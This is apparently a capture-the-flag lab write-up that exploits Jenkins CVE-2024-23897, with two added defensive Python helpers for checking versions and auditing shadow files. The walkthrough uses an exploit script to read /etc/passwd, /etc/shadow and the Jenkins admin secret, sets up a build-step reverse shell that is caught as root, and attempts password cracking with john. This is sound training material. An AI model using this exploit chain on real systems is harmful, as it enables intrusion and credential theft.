CVE-2024-23897


The target Jenkins instance is vulnerable to CVE-2024-23897 because it runs an outdated version, 2.401.2

A vulnerability was found in Jenkins. It has been declared as problematic. This vulnerability affects unknown code of the component Command Line Interface. The manipulation of the argument command leads to information disclosure. This vulnerability was named CVE-2024-23897. Furthermore, there is an exploit available. It is recommended to upgrade the affected component.
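A quick way to turn the version observation above into a repeatable check is to compare the reported Jenkins version against the first fixed release on its line. The block below is an added example for this writeup, not code from the page or from the Jenkins project; the fixed versions (weekly 2.442, LTS 2.426.3) are taken from the Jenkins security advisory of 2024-01-24, and the version strings tested are constructed, apart from the target's own 2.401.2. On a real instance the value comes from the X-Jenkins response header or the "About Jenkins" page.

```python
"""Version check for CVE-2024-23897 (Jenkins CLI arbitrary file read).

Added example, not code from the writeup or from Jenkins. Fixed versions per
the Jenkins security advisory of 2024-01-24: weekly 2.442 and LTS 2.426.3;
everything older on the respective release line is affected.
"""
import re
from typing import Tuple

FIXED_WEEKLY = (2, 442)      # first unaffected weekly release
FIXED_LTS = (2, 426, 3)      # first unaffected LTS release


def parse_version(text: str) -> Tuple[int, ...]:
    """Turn '2.401.2' (LTS) or '2.441' (weekly) into a comparable int tuple."""
    m = re.fullmatch(r"(\d+)\.(\d+)(?:\.(\d+))?", text.strip())
    if not m:
        raise ValueError(f"unrecognised Jenkins version: {text!r}")
    return tuple(int(part) for part in m.groups() if part is not None)


def release_line(version: Tuple[int, ...]) -> str:
    """LTS releases carry a third component (2.426.3); weeklies do not (2.441)."""
    return "lts" if len(version) == 3 else "weekly"


def is_vulnerable(text: str) -> bool:
    """True when the version predates the fix on its own release line."""
    version = parse_version(text)
    fixed = FIXED_LTS if release_line(version) == "lts" else FIXED_WEEKLY
    return version < fixed


def assess(text: str) -> dict:
    """Summarise one instance for an inventory or patch-status report."""
    version = parse_version(text)
    line = release_line(version)
    fixed = FIXED_LTS if line == "lts" else FIXED_WEEKLY
    return {
        "version": text.strip(),
        "line": line,
        "vulnerable": version < fixed,
        "fixed_in": ".".join(str(p) for p in fixed),
    }


if __name__ == "__main__":
    # 2.401.2 is the target's version from the writeup; the rest are constructed.
    for v in ("2.401.2", "2.426.2", "2.426.3", "2.441", "2.442", "2.440.1"):
        print(assess(v))
```

The comparison is done per release line because LTS and weekly numbers interleave: LTS 2.426.3 is fixed while weekly 2.441 is not, so a naive "newer is safer" comparison across lines gives the wrong answer.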

Exploit


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vmdak]
└─$ searchsploit -m java/webapps/51993.py ; mv 51993.py CVE-2024-23897.py
  Exploit: Jenkins 2.441 - Local File Inclusion
      URL: https://www.exploit-db.com/exploits/51993
     Path: /usr/share/exploitdb/exploits/java/webapps/51993.py
    Codes: CVE-2024-23897
 Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/PEN-200/PG_PRACTICE/vmdak/51993.py

Copied to the current directory

Exploitation


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vmdak]
└─$ python3 CVE-2024-23897.py --url http://127.0.0.1:8888 -p /etc/passwd
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
tcpdump:x:105:107::/nonexistent:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
dhcpcd:x:100:65534:DHCP Client Daemon,,,:/usr/lib/dhcpcd:/bin/false
messagebus:x:101:102::/nonexistent:/usr/sbin/nologin
tss:x:106:108:TPM software stack,,,:/var/lib/tpm:/bin/false
fwupd-refresh:x:989:989:Firmware update daemon:/var/lib/fwupd:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
systemd-resolve:x:992:992:systemd Resolver:/:/usr/sbin/nologin
syslog:x:103:104::/nonexistent:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
pollinate:x:102:1::/var/cache/pollinate:/bin/false
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
mysql:x:110:110:MySQL Server,,,:/nonexistent:/bin/false
sync:x:4:65534:sync:/bin:/bin/sync
ftp:x:111:112:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
root:x:0:0:root:/root:/bin/bash
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
usbmux:x:108:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
polkitd:x:991:991:User for polkitd:/:/usr/sbin/nologin
landscape:x:107:109::/var/lib/landscape:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uuidd:x:104:105::/run/uuidd:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
vmdak:x:1000:1000::/home/vmdak:/bin/sh
games:x:5:60:games:/usr/games:/usr/sbin/nologin

It works!

Fetching /root/.jenkins/secrets/initialAdminPassword


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vmdak]
└─$ python3 CVE-2024-23897.py --url http://127.0.0.1:8888 -p /root/.jenkins/secrets/initialAdminPassword 
140ef31373034d19a77baa9c6b84a200

140ef31373034d19a77baa9c6b84a200 is the initial admin password

Validation


The password worked, but the target Jenkins instance hasn’t even been initialized

Initializing Jenkins


I could just initialize the instance myself and get code execution, since Jenkins is running with the privileges of the root account

I will create a new job

New Job

Trigger

Setting up a build trigger

Build Steps

Setting up a Build Step to execute a reverse shell

Triggering Build Remotely


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vmdak]
└─$ curl http://localhost:8888/job/Privilege%20Escalation/build?token=qwe123

Invoking the trigger remotely

In the Jenkins GUI the build hangs, because the payload is executed during the Build Step

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vmdak]
└─$ nnc 1234               
listening on [any] 1234 ...
connect to [192.168.45.157] from (UNKNOWN) [192.168.125.103] 42832
bash: cannot set terminal process group (830): Inappropriate ioctl for device
bash: no job control in this shell
root@vmdak:~/.jenkins/workspace/Privilege Escalation# whoami
whoami
root
root@vmdak:~/.jenkins/workspace/Privilege Escalation# hostname
hostname
vmdak.local
root@vmdak:~/.jenkins/workspace/Privilege Escalation# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:9e:fa:06 brd ff:ff:ff:ff:ff:ff
    altname enp3s0
    inet 192.168.125.103/24 brd 192.168.125.255 scope global ens160
       valid_lft forever preferred_lft forever

System-level compromise

Fetching /etc/shadow


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vmdak]
└─$ python3 CVE-2024-23897.py --url http://127.0.0.1:8888 -p /etc/shadow          
sync:*:19836:0:99999:7:::
games:*:19836:0:99999:7:::
news:*:19836:0:99999:7:::
sshd:!:19894::::::
lp:*:19836:0:99999:7:::
www-data:*:19836:0:99999:7:::
systemd-network:!*:19836::::::
systemd-timesync:!*:19836::::::
dhcpcd:!:19836::::::
vmdak:$y$j9T$67oGS7fRiTKfRlI8a73JU1$9RNabWvHyOnkuSBwZ/YXhEvk7jnQ3mY4.zKIW7I9H04:19955:0:99999:7:::
_apt:*:19836:0:99999:7:::
root:$y$j9T$y3UT6o8YGAOCh7WX0IsEl.$Tlwx2N8ypOQlnRfbW8BlMSxq.4dOpvOqwXoSb0K91AA:19955:0:99999:7:::
tss:!:19836::::::
pollinate:!:19836::::::
backup:*:19836:0:99999:7:::
mysql:!:19955::::::
polkitd:!*:19836::::::
mail:*:19836:0:99999:7:::
ftp:!:19955::::::
sys:*:19836:0:99999:7:::
list:*:19836:0:99999:7:::
syslog:!:19836::::::
proxy:*:19836:0:99999:7:::
uucp:*:19836:0:99999:7:::
messagebus:!:19836::::::
nobody:*:19836:0:99999:7:::
man:*:19836:0:99999:7:::
fwupd-refresh:!*:19836::::::
tcpdump:!:19836::::::
irc:*:19836:0:99999:7:::
systemd-resolve:!*:19836::::::
bin:*:19836:0:99999:7:::
landscape:!:19836::::::
daemon:*:19836:0:99999:7:::
uuidd:!:19836::::::
usbmux:!:19894::::::

These hashes are yescrypt, which hashcat does not currently support
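From the defender's side, the shadow dump above is worth reading for what it says about account hygiene: which accounts hold a live hash, which scheme protects it, and which are locked. The block below is an added example for this writeup, not code from the page; it parses shadow(5) entries and groups them by state. The sample lines are constructed in the layout of the output above, with placeholder salt and hash text rather than real digests, and the prefix-to-scheme table follows crypt(5). yescrypt's memory-hard design is precisely what makes the cracking attempt later on the page so slow, so an audit like this mainly serves to flag any legacy scheme (md5crypt, sha256crypt, sha512crypt) that still needs migrating.

```python
"""Audit shadow(5) entries: live hashes per scheme, locked and passwordless accounts.

Added example, not code from the writeup. Sample lines are constructed; the
salt/hash material is placeholder text, not real digest output.
"""
from dataclasses import dataclass
from datetime import date, timedelta
from typing import Dict, List, Optional

# crypt(5) hash prefixes and the scheme they identify.
SCHEMES = {
    "$y$": "yescrypt",
    "$gy$": "gost-yescrypt",
    "$7$": "scrypt",
    "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
    "$6$": "sha512crypt",
    "$5$": "sha256crypt",
    "$1$": "md5crypt",
}


@dataclass
class ShadowEntry:
    user: str
    scheme: Optional[str]        # None when no recognisable hash is present
    locked: bool                 # password field starts with '!' or '*'
    empty: bool                  # empty password field: login without a password
    last_change: Optional[int]   # days since 1970-01-01, or None if unset

    def last_change_date(self) -> Optional[date]:
        if self.last_change is None:
            return None
        return date(1970, 1, 1) + timedelta(days=self.last_change)


def scheme_of(hash_field: str) -> Optional[str]:
    """Map a crypt(3) string to its scheme name; None for lock markers."""
    for prefix, name in SCHEMES.items():
        if hash_field.startswith(prefix):
            return name
    return None


def parse_shadow_line(line: str) -> ShadowEntry:
    fields = line.rstrip("\n").split(":")
    if len(fields) != 9:
        raise ValueError(f"expected 9 colon-separated fields: {line!r}")
    user, pw, last_change = fields[0], fields[1], fields[2]
    locked = pw.startswith("!") or pw.startswith("*")
    # A leading '!' may sit in front of a retained hash ('!$6$...'): locked, hash kept.
    scheme = scheme_of(pw.lstrip("!"))
    return ShadowEntry(
        user=user,
        scheme=scheme,
        locked=locked,
        empty=(pw == ""),
        last_change=int(last_change) if last_change else None,
    )


def summarize(lines: List[str]) -> Dict[str, object]:
    """Group accounts: live hashes per scheme, locked accounts, empty passwords."""
    live: Dict[str, List[str]] = {}
    locked: List[str] = []
    empty: List[str] = []
    for line in lines:
        if not line.strip():
            continue
        e = parse_shadow_line(line)
        if e.empty:
            empty.append(e.user)
        elif e.locked:
            locked.append(e.user)
        else:
            live.setdefault(e.scheme or "unknown", []).append(e.user)
    return {"live": live, "locked": locked, "empty_password": empty}


# Constructed sample in the writeup's layout; salt and hash text are placeholders.
SAMPLE = [
    "root:$y$j9T$SALTSALTSALTSALTSALT$HASHHASHHASHHASHHASHHASHHASHHASHHASHHASHHAS:19955:0:99999:7:::",
    "vmdak:$y$j9T$SALTSALTSALTSALTSALT$HASHHASHHASHHASHHASHHASHHASHHASHHASHHASHHAS:19955:0:99999:7:::",
    "legacy:$6$SALTSALT$HASHHASHHASHHASHHASHHASHHASH:19000:0:99999:7:::",
    "sync:*:19836:0:99999:7:::",
    "sshd:!:19894::::::",
    "systemd-network:!*:19836::::::",
    "svc:!$6$SALTSALT$HASHHASHHASHHASHHASHHASHHASH:19000:0:99999:7:::",
    "nopass::19000:0:99999:7:::",
]

if __name__ == "__main__":
    for entry in map(parse_shadow_line, SAMPLE):
        print(entry.user, entry.scheme, "locked" if entry.locked else "live",
              entry.last_change_date())
    print(summarize(SAMPLE))
```

Two details matter in practice: an empty password field is a finding in its own right (the account can log in without a password), and a `!` in front of a full hash means the account is locked but the original hash is still on disk, so it still counts towards the cracking exposure if the file leaks.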

Password Cracking (Fail)


Checking online reveals that yescrypt could be cracked using john.

However, the platform needs native libxcrypt support, which current Kali has

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vmdak]
└─$ john ./root.hash --wordlist=/usr/share/wordlists/rockyou.txt --format=crypt 
Using default input encoding: UTF-8
Loaded 1 password hash (crypt, generic crypt(3) [?/64])
Cost 1 (algorithm [1:descrypt 2:md5crypt 3:sunmd5 4:bcrypt 5:sha256crypt 6:sha512crypt]) is 0 for all loaded hashes
Cost 2 (algorithm specific iterations) is 1 for all loaded hashes
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:08:32 0.51% (ETA: 2025-04-11 01:18) 0g/s 172.2p/s 172.2c/s 172.2C/s newyear08..monkey#1
0g 0:00:08:35 0.52% (ETA: 2025-04-11 01:17) 0g/s 172.2p/s 172.2c/s 172.2C/s juliene..janele
Session aborted

john was unable to crack the password hashes; it takes too long